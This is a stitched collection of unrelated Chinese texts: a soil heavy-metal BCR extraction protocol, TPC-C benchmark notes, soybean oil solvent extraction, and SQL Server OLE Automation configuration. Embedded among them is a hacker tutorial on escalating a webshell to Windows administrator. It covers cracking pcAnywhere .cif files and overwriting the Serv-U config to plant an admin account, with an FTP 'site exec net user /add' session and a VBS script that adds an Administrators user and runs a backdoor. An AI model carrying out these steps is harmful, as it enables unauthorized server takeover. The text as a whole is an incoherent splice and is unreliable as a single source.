改进的BCR连续提取法包含四个步骤,其详细流程如下: 第1步(弱酸提取态):用精确度0.0001g的分析天平准确称取过100目筛的风干土壤样品0.5000-0.5010g放入50ml泡酸清洗过的离心管中,加入20mL 0.11mol/L 的CH3COOH溶液,(在添加浸提液和开始振荡这段时间不要耽搁太久)22±5℃下30±10 rpm振荡16小时,静置3-5分钟后轻摇离心管使管壁的所有样品均进入溶液中,然后以4000rpm的转速离心15min。将上清液移入50mL泡酸清洗过的聚乙烯瓶中,于4℃条件下保存、待测。往残余物中加入15mL去离子水,振荡15分钟,静置3-5分钟后轻摇离心管使管壁的所有样品均进入溶液中,以4000rpm的转速离心15min,小心弃去上清液。 第2步(可还原态):向上一步提取后的剩余沉积物样品中加入现配的20mL 0.5mol/L的(NH2OH·HCl)盐酸羟胺溶液(该溶液要现配现用,2mol/L HNO3酸化,pH 1.5),22±5℃下振荡16小时,静置3-5分钟后轻摇离心管使管壁的所有样品均进入溶液中,然后以4000rpm的转速离心15min。将上清液移入50ml 泡酸清洗过的聚乙烯瓶中,于4℃条件下保存、待测。往残余物中加入15mL去离子水,振荡15分钟,静置3-5分钟后轻摇离心管使管壁的所有样品均进入溶液中,以4000rpm的转速离心15min,小心弃去上清液。 第3 步(可氧化态):分步向上一步提取后的剩余样品中加入5mL 8.8mol/ml的双氧水原液(pH值2-3),盖上盖子但不要拧紧,利用振荡器间歇5min摇动离心管,在室温下消化1小时,然后将其移至水浴锅中,于85±2℃下消化1小时(前半小时要间歇性的进行手摇振荡以防止样品溢出),打开离心管盖,继续在85±2℃下加热至管内溶液剩余3mL以下。再加入5mL双氧水原液,在85±2℃下继续加热至溶液近干(1mL以下)。待离心管冷却后,加入20mL 1mol/L pH 值为2.0的乙酸铵溶液(浓HNO3酸化pH 2.0),22±5℃下振荡16小时,静置3-5分钟后轻摇离心管使管壁的所有样品均进入溶液中,然后以4000rpm的转速离心15min。将上清液移入50ml 泡酸清洗过的聚乙烯瓶中,于4℃条件下保存、待测。往残余物中加入15mL去离子水,振荡15分钟,静置3-5分钟后轻摇离心管使管壁的所有样品均进入溶液中,以4000rpm的转速离心15min,小心弃去上清液。 第4步(残渣态):借助漩涡震荡仪用6mL浓HNO3分两次(每次3mL)洗出离心管中剩余的样品到聚四氟乙烯消煮管,再先后用2mL HF和3mL HCl将离心管剩余残渣洗涤后转移至消煮管中,用微波消解仪对土壤进行消解后,赶酸至消煮管中剩余液体体积如黄豆大小,然后借助旋涡震荡仪用1%HNO3洗涤消煮管,液体转移至聚乙烯瓶定容到25mL。 第5步(总量):准确称取过100目筛的风干土壤样品0.500g,加入6mL HNO3 2mLHF和3mL HCl,用微波消解仪对土壤进行消解后,赶酸至消煮管中剩余液体体积如黄豆大小,然后借助旋涡震荡仪用1%HNO3洗涤消煮管,液体转移至聚乙烯瓶定容到25mL。
系统处理能力TPC估算方法 1 TPC 标准介绍 在对系统进行方案设计时, 通常会遇到下列问题: a) 配置什么样的服务器设备? b) 系统性能如何? c) 系统能够满足多长时间的应用? 单凭历史经验给出一个经验值来评估整套系统显然是不够的, 必须拿出足够的理 论证据来证明设计中已考虑到了上述问题。通常, 采用TPC 的基准测试来衡量硬件服务器的处理能力, 同时, 采用通用计算公式估算软件所需的处理能力。 1.1 TPC TPC 是由数10 家会员公司创建的非盈利组织,总部设在美国。该组织对全世界开放, 但迄今为止,绝大多数会员都是美、日和西欧的大公司。TPC 的成员主要是计算机软硬件厂家, 而非计算机用户, 它的功能是制定商务应用基准程序的标准规范、性能和价格度量, 并管理测试结果的发布。 TPC 的测试结果和出版物是开放的, 可以通过网站( http: //https://www.doczj.com/doc/a812542022.html,) 获取详细信息。IBM、NCR、HP、SUN 等国际著名服务器供应商均是TPC 会员,这些公司旗下的产品均会在网站上公布TPC 的测试结果。目前, 国内的工程项目中大量采用了上述公司制造的服务器类产品, 因而这些数据对于设计阶段的性能估算很有参考价值。至今, TPC 已经推出了4 套基准程序( TPC- A、TPC- B、TPC- C 和TPC- D) 。其中TPC- A 和TPC- B已经过时, 不再使用。TPC- C 是在线事务处理(OLTP) 的基准程序, TPC- D 是决策支持的基准程序。目前, 工程设计中常见的系统均为在线事务处理型( 包括BSS、OSS 和OA) , 因此TPC- C 基准测试是本文关注的重点。 1.2 TPC- C 基准测试 TPC- C 是一种旨在衡量OLTP 系统性能与可伸缩性的行业标准基准测试项目。这种基准测试项目将对包括查询、更新及队列式小批量事务在内的广泛数据库功能进行测试。许多数据专业设计人员将TPC- C视为衡量“真实”OLTP 系统性能的有效指示器。TPC- C 基准测试是对硬件处理能力的考核标准。TPC- C 通过模拟一个批发商的货物管理系统,衡量硬件服务器的性能指标( 查询、统计功能的执行效率) 。TPC 对具体的测试环境, 也做了详细的规定。 1.2.1 测试环境 批发公司有W个仓库, 每个仓库供应10 个地区, 其中每个地区为3 000 名顾客服务。每个仓库中有10 个终端, 每个终端用于一个地区。在运行时,10×W个终端操作员向公司的数据库发出5 类请求。 1.2.2 逻辑和流程 该系统需要处理的交易有以下几种。
说到花了九牛二虎的力气获得了一个webshell, 当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~ 嘻嘻~~好跟我来,看看有什么可以利用的来提升权限 第一 如果服务器上有装了pcanywhere服务端,管理员为了管理方便 也给了我们方便,到系统盘的Documents and Settings/All Us ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地 破解就使用pcanywhere连接就ok了 第二 有很多小黑问我这么把webshell的iis user权限提升 一般服务器的管理都是本机设计完毕然后上传到空间里, 那么就会用到ftp,服务器使用最多的就是servu 那么我们就利用servu来提升权限 通过servu提升权限需要servu安装目录可写~ 好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载下来,然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖,启动servu添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限 然后去servu安装目录里把ServUDaemon.ini更换服务器上的。 用我新建的用户和密码连接~ 好的,还是连上了 ftp ftp>open ip Connected to ip. 220 Serv-U FTP Server v5.0.0.4 for WinSock ready... User (ip:(none)): id //刚才添加的用户 331 User name okay, please send complete E-mail address as password. Password:password //密码 230 User logged in, proceed. ftp> cd winnt //进入win2k的winnt目录 250 Directory changed to /WINNT ftp>cd system32 //进入system32目录 250 Directory changed to /WINNT/system32 ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe 文件加用户。 如果提示没有权限,那我们就 把后门(server.exe)传他system32目录 然后写一个VBs教本 set wshshell=createobject ("wscript.shell") a=wshshell.run ("cmd.exe /c net user user pass /add",0) b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0) b=wshshell.run ("cmd.exe /c server.exe",0)
浸出法制取大豆油 发布者:acr 发布时间:2009-7-22 阅读:1 027次 浸出法制油是目前世界上先进的取油技术。自1870年间世以来,经过了百余年的历史,其工艺不断得到改进和完善,到目前为止,已成为世界油脂工业中植物油制取的主要方式。 (一)浸出法制油的基本原理及要素 浸出法制油是利用能溶解油脂的溶剂,通过润湿渗透、分子扩散和对流扩散的作用,将料胚中的油脂浸提出来,然后把由溶剂和脂肪所组成的混合油进行分离,回收溶剂而得到毛油,同样也要将豆粕中的溶剂回收,得到浸出粕。这个过程中,基本要素是溶剂和料胚以及决定浸出效果的浸出方式和工艺参数。 1.溶剂的选择 理想的浸出溶剂应符合以下基本要求: ①能在室温或低温下以任何比例溶解油脂; ②溶剂的选择性要好,即除油脂外,不溶解其它成分。 ③化学性质稳定,对光和水具稳定性,经加热、蒸发与冷却不起化学变化。 ④要求溶剂沸点低,比热小和汽化潜热小,易从粕和油中分离回收。 ⑤溶剂本身无毒性,呈中性,无异味,不污染。 ⑥溶剂与油、粕和设备材料均不发生化学反应。 我国制油工业实际生产中应用最普遍的浸出溶剂有工业已烷或轻汽油等几种脂肪 族碳氢化合物。其中轻汽油是我国目前应用最多的一种溶剂,它是石油原料低沸点分馏产物,符合溶剂上述的基本要求。但最大缺点是易燃易爆,空气中含量达到1.25~4.9%时,有爆炸危险。同时,轻汽油成分复杂,沸点范围较宽。 除此之外,还有丙酮、丁酮、异丙醇、丁烷以及一些复合型溶剂都可用于油脂浸出,有些已在研究试用。 2.对料胚的要求 大豆原料经过预处理,应使其料胚的结构与性质满足浸出工艺要求,才会获得好的浸出效果。 ①细胞破坏程度越彻底越好。 ②料胚薄而结实,粉末度小。这样浸出距离短,溶剂与料胚接触面积大,有利于提高浸效率。大豆直接浸出法要求料胚厚度0.2~0.3mm。 ③水分适宜,浸出溶剂不溶于水,如果料胚中水分高了,内部空隙充满水分, 就会影响到溶剂的渗透和对油脂的溶解作用。所以料胚水分宜低。(<13%,5~7%) ④适当的温度,料胚温度高,油脂粘度低,容易流动,浸出效果好,但应注意,料胚温度不宜超过溶剂的沸点,以免使溶剂汽化。所以料胚温度一般控制在45~55℃,不宜超过60℃。 (二)、浸出制油工艺 1.常规工艺总体流程 一个完整的浸出工艺包括溶剂浸出,混合油分离、湿粕脱溶烘干以及溶剂回收等工序。 浸出法工艺流程图
MSSQL 通过存储过程调用WEB服务解决方法 在数据库的脚本开发过程中,由于需要及时的通过服务中网站中获取及时信息,比如:输入身份证查询考试成绩,输入身份证查询医保卡信息等;SQLSERVER中存储过程来调用外部服务,但是此服务需要sysadmin角色权限。 以下为配置的要求以及源代码: 1, 环境需求设置 开通’ sys.sp_OACreate’以及'Ole Automation Procedures'访问设置: 如果要是SQLSERVER里面实现调用WEB服务、操作文件等相关操作,需通过SQLSERVER的自带组建Ole Automation Procedures,默认情况下这个组件是禁止的。 SQL Server阻止了对组件'Ole Automation Procedures'的过程'sys.sp_OACreate'的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure启用'Ole Automation Procedures'。有关启用'Ole Automation Procedures'的详细信息,请参阅SQL Server联机丛书中的"外围应用配置器"。语句已终止。 Ole Automation Procedures选项 使用Ole Automation Procedures选项可指定是否可以在Transact-SQL批处理中实例化OLE Automation对象。也可以使用外围应用配置器工具来配置此选项。有关详细信息,请参阅外围应用配置器。 可以将Ole Automation Procedures选项设置为以下值。 禁用OLE Automation Procedures。SQL Server 2005新实例的默认值。 1 启用OLE Automation Procedures。